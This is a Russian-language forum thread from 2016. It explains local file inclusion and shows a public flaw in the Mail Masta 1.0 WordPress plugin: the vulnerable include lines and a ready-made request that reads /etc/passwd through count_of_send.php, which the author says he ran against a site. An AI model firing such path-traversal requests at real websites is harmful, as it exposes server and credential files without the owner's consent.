ПЕНТЕСТИНГ Уязвимость в плагине Mail Masta Plugin 1.0 для WordPress

Тема в разделе "ПЕНТЕСТИНГ (Паблик)", создана пользователем Hooko, 15 сен 2016.

↑ ↓
  1. Hooko Уважаемый пользователь
    Hooko
    Ответить в чате

    Форумчанин

    Регистрация:
    24.08.2016
    Сообщения:
    137
    Симпатии:
    144
    Пол:
    Мужской
    Репа:
    +149 / 3 / -4
    Jabber:
    Сегодня господа мы поговорим о LFI уязвимости в плагине Mail Masta Plugin 1.0 который используется в WordPress

    Для начало разберемся что такое LFI
    LFI - Local file include - это популярный и часто эксплуатируемый способ взлома сайтов и веб приложений.
    LFI - это одна из самых опасных уязвимостей сайта.
    Эксплуатация LFI представляет максимальную угрозу для атакуемого сайта, и практически во всех случаях приводит к его взлому.
    LFI - это возможность использования локальных системных файлов сервера. Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере, в том числе содержащую конфиденциальную информацию.
    LFI - позволяет злоумышленнику выполнить или получить данные с локального файла.
    LFI возникает в случае, когда проверка входящих данных и параметров в коде сайта отсутствует или недостаточна.
    Возможность эксплуатации LFI (Remote file include) возникает из за грубейших ошибок разработки сайта, отсутствия фильтрации передающих параметров, а также некорректной настройки сервера.

    Для примера:
    http://site.ru/preview.php?file=example.html
    http://site.ru/preview.php?file=../../../../etc/passwd

    Уязвимые строки в плагине
    Код:
    Файл /inc/campaign/count_of_send.php
    Строка 4 : include($_GET[’pl’]);
    
    Файл /inc/lists/csvexport.php:
    Строка 5: include($_GET[’pl’]);
    
    Файл /inc/campaign/count_of_send.php
    Строка 4: include($_GET[’pl’]);
    
    Файл /inc/lists/csvexport.php
    Строка 5: include($_GET[’pl’]);
    
    Файл /inc/campaign/count_of_send.php
    Строка 4: include($_GET[’pl’]);
    Для примера возьмем сайт
    http://sire.ru/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

    [​IMG]
    [​IMG]
    [​IMG]
    [​IMG]

    Как вы видите благодаря этому багу я получил доступ к файлы /etc/passwd
     
    • Мне нравится Мне нравится x 1
  2. vanya_ivanov Житель форума
    vanya_ivanov
    Ответить в чате

    Форумчанин

    Регистрация:
    16.09.2016
    Сообщения:
    1
    Симпатии:
    0
    Репа:
    +0 / 0 / -0
    Дядя, а чего плагин то такой школьный выбрал или это репост с happy hack?
     
  3. Hooko Уважаемый пользователь
    Hooko
    Ответить в чате

    Форумчанин

    Регистрация:
    24.08.2016
    Сообщения:
    137
    Симпатии:
    144
    Пол:
    Мужской
    Репа:
    +149 / 3 / -4
    Jabber:
    Выбрал, что бы вам показать! Есть что-то интересное - выкладывай, оценим.

    https://www.exploit-db.com/exploits/40290/
     
  4. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.800
    Симпатии:
    425
    Пол:
    Мужской
    Репа:
    +957 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Хорошая статья, создал специальный раздел для паблик-статей по пентестеснгу и вопросов:ПЕНТЕСТИНГ (Паблик)

    По больше-бы статей для новичков, особенно по Кали и т.д., актуально сейчас ! :)

    А комменты на подобие этого:
    Можно не слушать, чел. так и не привел примеры своих статей и работ, кроме "Бла-бла-бла", так ничего и не услышал здесь на борде...Dmeh-Smeh-Smeh!!!
     

Поделиться этой страницей